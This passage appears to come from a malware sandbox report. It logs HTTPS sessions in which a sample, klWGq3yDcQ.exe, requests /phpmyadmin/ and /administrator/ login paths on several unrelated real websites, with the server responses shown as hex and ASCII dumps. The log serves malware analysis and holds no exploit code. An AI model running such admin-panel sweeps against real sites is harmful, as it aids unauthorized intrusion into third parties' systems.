                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:35 UTC361INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 33 33 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 45 78 70 69 72 65 73 3a 20 57 65 64 2c 20 31 31 20 4a 61 6e 20 31 39 38 34 20 30 35 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 0d 0a 4c 69 6e 6b 3a 20 3c 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 72 67 31 37 67 65 62 6c 65 72 67 61 73 73 65 2e 61 74 2f 77 70 2d 6a 73 6f 6e 2f 3e 3b 20 72 65 6c 3d 22 68 74 74 70 73 3a 2f 2f 61 70 69 2e 77 2e 6f 72 67 2f 22 0d 0a 55 70 67 72 61 64 65 3a 20
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:33 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://www.grg17geblergasse.at/wp-json/>; rel="https://api.w.org/"Upgrade:
                                                                                                                                                                                                    2023-11-26 05:59:35 UTC7831INData Raw: 33 64 39 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 64 65 2d 44 45 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 72 67 31 37 67 65 62 6c 65 72 67 61 73 73 65 2e 61 74 2f 78 6d 6c 72 70 63 2e 70 68 70 22 20 2f 3e 0a 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 09 09 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65
                                                                                                                                                                                                    Data Ascii: 3d96<!DOCTYPE html><html lang="de-DE"><head><meta charset="UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge"><link rel="pingback" href="https://www.grg17geblergasse.at/xmlrpc.php" /><script type="text/javascript">document.docume
                                                                                                                                                                                                    2023-11-26 05:59:35 UTC7941INData Raw: 72 69 67 68 74 3a 20 61 75 74 6f 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 62 6f 64 79 20 2e 69 73 2d 6c 61 79 6f 75 74 2d 63 6f 6e 73 74 72 61 69 6e 65 64 20 3e 20 2e 61 6c 69 67 6e 6c 65 66 74 7b 66 6c 6f 61 74 3a 20 6c 65 66 74 3b 6d 61 72 67 69 6e 2d 69 6e 6c 69 6e 65 2d 73 74 61 72 74 3a 20 30 3b 6d 61 72 67 69 6e 2d 69 6e 6c 69 6e 65 2d 65 6e 64 3a 20 32 65 6d 3b 7d 62 6f 64 79 20 2e 69 73 2d 6c 61 79 6f 75 74 2d 63 6f 6e 73 74 72 61 69 6e 65 64 20 3e 20 2e 61 6c 69 67 6e 72 69 67 68 74 7b 66 6c 6f 61 74 3a 20 72 69 67 68 74 3b 6d 61 72 67 69 6e 2d 69 6e 6c 69 6e 65 2d 73 74 61 72 74 3a 20 32 65 6d 3b 6d 61 72 67 69 6e 2d 69 6e 6c 69 6e 65 2d 65 6e 64 3a 20 30 3b 7d 62 6f 64 79 20 2e 69 73 2d 6c 61 79 6f 75 74 2d 63 6f 6e 73 74 72 61 69 6e 65 64 20 3e
                                                                                                                                                                                                    Data Ascii: right: auto !important;}body .is-layout-constrained > .alignleft{float: left;margin-inline-start: 0;margin-inline-end: 2em;}body .is-layout-constrained > .alignright{float: right;margin-inline-start: 2em;margin-inline-end: 0;}body .is-layout-constrained >
                                                                                                                                                                                                    2023-11-26 05:59:35 UTC2INData Raw: 0d 0a
                                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                                    2023-11-26 05:59:35 UTC8192INData Raw: 31 66 34 30 0d 0a 74 6f 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 7d 66 69 67 75 72 65 7b 6d 61 72 67 69 6e 3a 30 7d 74 61 62 6c 65 7b 62 6f 72 64 65 72 2d 63 6f 6c 6c 61 70 73 65 3a 63 6f 6c 6c 61 70 73 65 3b 62 6f 72 64 65 72 2d 73 70 61 63 69 6e 67 3a 30 7d 61 72 74 69 63 6c 65 2c 61 73 69 64 65 2c 66 6f 6f 74 65 72 2c 68 65 61 64 65 72 2c 68 67 72 6f 75 70 2c 6e 61 76 2c 73 65 63 74 69 6f 6e 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 62 6f 64 79 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 4f 70 65 6e 20 53 61 6e 73 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 63 6f 6c 6f 72 3a 23 36 36 36 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 37 65
                                                                                                                                                                                                    Data Ascii: 1f40to;padding:10px}figure{margin:0}table{border-collapse:collapse;border-spacing:0}article,aside,footer,header,hgroup,nav,section{display:block}body{font-family:Open Sans,Arial,sans-serif;font-size:14px;color:#666;background-color:#fff;line-height:1.7e
                                                                                                                                                                                                    2023-11-26 05:59:35 UTC7822INData Raw: 6b 69 74 2d 74 72 61 6e 73 69 74 69 6f 6e 3a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 20 2e 35 73 20 65 61 73 65 3b 2d 6d 6f 7a 2d 74 72 61 6e 73 69 74 69 6f 6e 3a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 20 2e 35 73 20 65 61 73 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 37 65 33 62 64 30 21 69 6d 70 6f 72 74 61 6e 74 3b 63 6f 6c 6f 72 3a 23 66 66 66 21 69 6d 70 6f 72 74 61 6e 74 7d 2a 20 68 74 6d 6c 20 2e 63 6c 65 61 72 66 69 78 2c 3a 66 69 72 73 74 2d 63 68 69 6c 64 2b 68 74 6d 6c 20 2e 63 6c 65 61 72 66 69 78 7b 7a 6f 6f 6d 3a 31 7d 2e 69 70 68 6f 6e 65 20 2e 65 74 5f 70 62 5f 73 65 63 74 69 6f 6e 5f 76 69 64 65 6f 5f 62 67 20 76 69 64 65 6f 3a 3a 2d 77 65 62 6b 69 74 2d 6d 65 64 69 61 2d 63 6f 6e 74 72 6f 6c 73 2d 73 74
                                                                                                                                                                                                    Data Ascii: kit-transition:background-color .5s ease;-moz-transition:background-color .5s ease;background-color:#7e3bd0!important;color:#fff!important}* html .clearfix,:first-child+html .clearfix{zoom:1}.iphone .et_pb_section_video_bg video::-webkit-media-controls-st
                                                                                                                                                                                                    2023-11-26 05:59:35 UTC2INData Raw: 0d 0a
                                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                                    2023-11-26 05:59:35 UTC8192INData Raw: 31 66 34 30 0d 0a 6c 61 78 5f 62 67 2e 65 74 5f 70 61 72 61 6c 6c 61 78 5f 62 67 5f 70 68 6f 6e 65 2c 2e 65 74 5f 70 61 72 61 6c 6c 61 78 5f 62 67 2e 65 74 5f 70 61 72 61 6c 6c 61 78 5f 62 67 5f 74 61 62 6c 65 74 2c 2e 65 74 5f 70 61 72 61 6c 6c 61 78 5f 67 72 61 64 69 65 6e 74 2e 65 74 5f 70 61 72 61 6c 6c 61 78 5f 67 72 61 64 69 65 6e 74 5f 5f 68 6f 76 65 72 2c 2e 65 74 5f 70 61 72 61 6c 6c 61 78 5f 67 72 61 64 69 65 6e 74 2e 65 74 5f 70 61 72 61 6c 6c 61 78 5f 67 72 61 64 69 65 6e 74 5f 70 68 6f 6e 65 2c 2e 65 74 5f 70 61 72 61 6c 6c 61 78 5f 67 72 61 64 69 65 6e 74 2e 65 74 5f 70 61 72 61 6c 6c 61 78 5f 67 72 61 64 69 65 6e 74 5f 74 61 62 6c 65 74 2c 2e 65 74 5f 70 62 5f 73 65 63 74 69 6f 6e 5f 70 61 72 61 6c 6c 61 78 5f 68 6f 76 65 72 3a 68 6f 76 65
                                                                                                                                                                                                    Data Ascii: 1f40lax_bg.et_parallax_bg_phone,.et_parallax_bg.et_parallax_bg_tablet,.et_parallax_gradient.et_parallax_gradient__hover,.et_parallax_gradient.et_parallax_gradient_phone,.et_parallax_gradient.et_parallax_gradient_tablet,.et_pb_section_parallax_hover:hove
                                                                                                                                                                                                    2023-11-26 05:59:35 UTC1505INData Raw: 7b 63 6f 6c 6f 72 3a 23 36 36 36 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 65 74 5f 70 62 5f 62 67 5f 6c 61 79 6f 75 74 5f 64 61 72 6b 5f 70 68 6f 6e 65 2c 2e 65 74 5f 70 62 5f 62 67 5f 6c 61 79 6f 75 74 5f 64 61 72 6b 5f 70 68 6f 6e 65 20 68 31 2c 2e 65 74 5f 70 62 5f 62 67 5f 6c 61 79 6f 75 74 5f 64 61 72 6b 5f 70 68 6f 6e 65 20 68 32 2c 2e 65 74 5f 70 62 5f 62 67 5f 6c 61 79 6f 75 74 5f 64 61 72 6b 5f 70 68 6f 6e 65 20 68 33 2c 2e 65 74 5f 70 62 5f 62 67 5f 6c 61 79 6f 75 74 5f 64 61 72 6b 5f 70 68 6f 6e 65 20 68 34 2c 2e 65 74 5f 70 62 5f 62 67 5f 6c 61 79 6f 75 74 5f 64 61 72 6b 5f 70 68 6f 6e 65 20 68 35 2c 2e 65 74 5f 70 62 5f 62 67 5f 6c 61 79 6f 75 74 5f 64 61 72 6b 5f 70 68 6f 6e 65 20 68 36 7b 63 6f 6c 6f 72 3a 23 66 66 66 21 69 6d 70 6f 72 74 61 6e
                                                                                                                                                                                                    Data Ascii: {color:#666!important}.et_pb_bg_layout_dark_phone,.et_pb_bg_layout_dark_phone h1,.et_pb_bg_layout_dark_phone h2,.et_pb_bg_layout_dark_phone h3,.et_pb_bg_layout_dark_phone h4,.et_pb_bg_layout_dark_phone h5,.et_pb_bg_layout_dark_phone h6{color:#fff!importan
                                                                                                                                                                                                    2023-11-26 05:59:35 UTC2INData Raw: 0d 0a
                                                                                                                                                                                                    Data Ascii:


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    133192.168.2.45770474.220.219.1894436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC177OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                    Host: himontessori.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC420INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 33 33 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 45 78 70 69 72 65 73 3a 20 57 65 64 2c 20 31 31 20 4a 61 6e 20 31 39 38 34 20 30 35 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 0d 0a 4c 69 6e 6b 3a 20 3c 68 74 74 70 73 3a 2f 2f 68 69 6d 6f 6e 74 65 73 73 6f 72 69 2e 63 6f 6d 2f 77 70 2d 6a 73 6f 6e 2f 3e 3b 20 72 65 6c 3d 22 68 74 74 70 73 3a 2f 2f 61 70 69 2e 77 2e 6f 72 67 2f 22 0d 0a 55 70 67 72 61 64 65 3a 20 68 32 2c 68 32 63 0d
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:33 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://himontessori.com/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2c
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC7772INData Raw: 32 62 34 37 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 20 66 62 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 2f 66 62 23 20 61 72 74 69 63 6c 65 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 2f 61 72 74 69 63 6c 65 23 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20
                                                                                                                                                                                                    Data Ascii: 2b47<!doctype html><html lang="en-US" prefix="og: http://ogp.me/ns# fb: http://ogp.me/ns/fb# article: http://ogp.me/ns/article#"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile"
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC3313INData Raw: 2d 70 6f 73 74 5f 74 79 70 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 6f 62 6a 65 63 74 2d 70 61 67 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 68 61 73 2d 63 68 69 6c 64 72 65 6e 20 6d 65 6e 75 2d 69 74 65 6d 2d 33 34 31 32 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 69 6d 6f 6e 74 65 73 73 6f 72 69 2e 63 6f 6d 2f 61 62 6f 75 74 75 73 2f 22 3e 41 62 6f 75 74 20 48 4d 53 3c 2f 61 3e 0a 3c 75 6c 20 63 6c 61 73 73 3d 22 73 75 62 2d 6d 65 6e 75 22 3e 0a 09 3c 6c 69 20 69 64 3d 22 6d 65 6e 75 2d 69 74 65 6d 2d 33 34 31 35 22 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 20 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 70 6f 73 74 5f 74 79 70 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 6f 62 6a 65 63 74 2d 70 61 67 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 33 34 31 35
                                                                                                                                                                                                    Data Ascii: -post_type menu-item-object-page menu-item-has-children menu-item-3412"><a href="https://himontessori.com/aboutus/">About HMS</a><ul class="sub-menu"><li id="menu-item-3415" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-3415
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC2INData Raw: 0d 0a
                                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC8192INData Raw: 33 62 31 30 0d 0a 09 09 09 09 09 0a 09 09 09 09 09 0a 09 09 09 09 3c 2f 6e 61 76 3e 3c 21 2d 2d 20 23 73 69 74 65 2d 6e 61 76 69 67 61 74 69 6f 6e 20 2d 2d 3e 09 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 64 69 76 3e 0a 09 3c 68 65 61 64 65 72 20 69 64 3d 22 6d 61 73 74 68 65 61 64 22 20 63 6c 61 73 73 3d 22 73 69 74 65 2d 68 65 61 64 65 72 20 62 61 62 79 2d 68 65 61 64 2d 69 6d 67 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 2d 68 65 61 64 65 72 2d 69 6d 67 22 3e 20 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 61 62 79 2d 63 6f 6e 74 61 69 6e 65 72 20 73 69 74 65 2d 62 72 61 6e 64 69 6e 67 20 22 3e 0a 20 20 20 20 20 20 20
                                                                                                                                                                                                    Data Ascii: 3b10</nav>... #site-navigation --></div></div></div><header id="masthead" class="site-header baby-head-img"> <div class="no-header-img"> <div class="baby-container site-branding ">
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC6934INData Raw: 30 32 31 20 3c 2f 6f 70 74 69 6f 6e 3e 0a 09 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 27 68 74 74 70 73 3a 2f 2f 68 69 6d 6f 6e 74 65 73 73 6f 72 69 2e 63 6f 6d 2f 32 30 32 31 2f 30 34 2f 27 3e 20 41 70 72 69 6c 20 32 30 32 31 20 3c 2f 6f 70 74 69 6f 6e 3e 0a 09 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 27 68 74 74 70 73 3a 2f 2f 68 69 6d 6f 6e 74 65 73 73 6f 72 69 2e 63 6f 6d 2f 32 30 32 31 2f 30 33 2f 27 3e 20 4d 61 72 63 68 20 32 30 32 31 20 3c 2f 6f 70 74 69 6f 6e 3e 0a 09 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 27 68 74 74 70 73 3a 2f 2f 68 69 6d 6f 6e 74 65 73 73 6f 72 69 2e 63 6f 6d 2f 32 30 32 31 2f 30 32 2f 27 3e 20 46 65 62 72 75 61 72 79 20 32 30 32 31 20 3c 2f 6f 70 74 69 6f 6e 3e 0a 09 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 27 68 74 74
                                                                                                                                                                                                    Data Ascii: 021 </option><option value='https://himontessori.com/2021/04/'> April 2021 </option><option value='https://himontessori.com/2021/03/'> March 2021 </option><option value='https://himontessori.com/2021/02/'> February 2021 </option><option value='htt
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC2INData Raw: 0d 0a
                                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC4275INData Raw: 31 30 61 36 0d 0a 0a 09 09 3c 2f 73 65 6c 65 63 74 3e 0a 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 3e 0a 2f 2a 20 3c 21 5b 43 44 41 54 41 5b 20 2a 2f 0a 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 09 76 61 72 20 64 72 6f 70 64 6f 77 6e 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 20 22 61 72 63 68 69 76 65 73 2d 64 72 6f 70 64 6f 77 6e 2d 2d 31 22 20 29 3b 0a 09 66 75 6e 63 74 69 6f 6e 20 6f 6e 53 65 6c 65 63 74 43 68 61 6e 67 65 28 29 20 7b 0a 09 09 69 66 20 28 20 64 72 6f 70 64 6f 77 6e 2e 6f 70 74 69 6f 6e 73 5b 20 64 72 6f 70 64 6f 77 6e 2e 73 65 6c 65 63 74 65 64 49 6e 64 65 78 20 5d 2e 76 61 6c 75 65 20 21 3d 3d 20 27 27 20 29 20 7b 0a 09 09 09 64 6f 63 75 6d 65 6e
                                                                                                                                                                                                    Data Ascii: 10a6</select><script type='text/javascript'>/* <![CDATA[ */(function() {var dropdown = document.getElementById( "archives-dropdown--1" );function onSelectChange() {if ( dropdown.options[ dropdown.selectedIndex ].value !== '' ) {documen


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    134192.168.2.45792345.40.150.544436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC235OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                    Host: engel-firm.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Referer: https://engel-firm.com/administrator/
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC208INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 53 65 72 76 65 72 3a 20 6f 70 65 6e 72 65 73 74 79 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 33 35 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 78 2d 62 61 63 6b 65 6e 64 3a 20 76 61 72 6e 69 73 68 5f 73 73 6c 0d 0a 53 74 72 69 63 74 2d 54 72 61 6e 73 70 6f 72 74 2d 53 65 63 75 72 69 74 79 3a 20 6d 61 78 2d 61 67 65 3d 33 31 35 33 36 30 30 30 3b 20 69 6e 63 6c 75 64 65 53 75 62 44 6f 6d 61 69 6e 73 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 403 ForbiddenServer: openrestyDate: Sun, 26 Nov 2023 05:59:35 GMTContent-Length: 0Connection: closex-backend: varnish_sslStrict-Transport-Security: max-age=31536000; includeSubDomains


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    135192.168.2.45777395.168.220.2104436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC304OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                    Host: beachrecruitment.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    Cookie: k8spersistent=22cb6f4364865b2e22019c7dac43ae73|11f187638643e13d7bd1963991fac52b; OF=3dbfg2bnrmlhvmjhpi48421sg2
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC429INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 64 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 33 33 20 47 4d 54 0d 0a 63 6f 6e 74 65 6e 74 2d 74 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 63 6f 6e 74 65 6e 74 2d 6c 65 6e 67 74 68 3a 20 30 0d 0a 65 78 70 69 72 65 73 3a 20 54 68 75 2c 20 31 39 20 4e 6f 76 20 31 39 38 31 20 30 38 3a 35 32 3a 30 30 20 47 4d 54 0d 0a 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 70 6f 73 74 2d 63 68 65 63 6b 3d 30 2c 20 70 72 65 2d 63 68 65 63 6b 3d 30 0d 0a 70 72 61 67 6d 61 3a 20
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 301 Moved Permanentlydate: Sun, 26 Nov 2023 05:59:33 GMTcontent-type: text/html; charset=utf-8content-length: 0expires: Thu, 19 Nov 1981 08:52:00 GMTcache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0pragma:


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    136192.168.2.45780334.136.104.2554436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC233OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                    Host: tiswheels.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Referer: https://tiswheels.com/administrator/
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC425INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 33 34 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 78 2d 70 6f 77 65 72 65 64 2d 62 79 3a 20 57 50 20 45 6e 67 69 6e 65 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 45 78 70 69 72 65 73 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 36 3a 35 39 3a 33 34 20 47 4d 54 0d 0a 58 2d 52 65 64 69 72 65 63 74
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 301 Moved PermanentlyServer: nginxDate: Sun, 26 Nov 2023 05:59:34 GMTContent-Type: text/html; charset=UTF-8Content-Length: 0Connection: closex-powered-by: WP EnginePragma: no-cacheExpires: Sun, 26 Nov 2023 06:59:34 GMTX-Redirect


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    137192.168.2.45803667.205.16.724436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC310OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                    Host: capforge.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    Cookie: pbid=1edc227536cb7fc30f88097431cc67116634c85ffdbc8581853118f953068a74
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Referer: https://capforge.com/administrator/
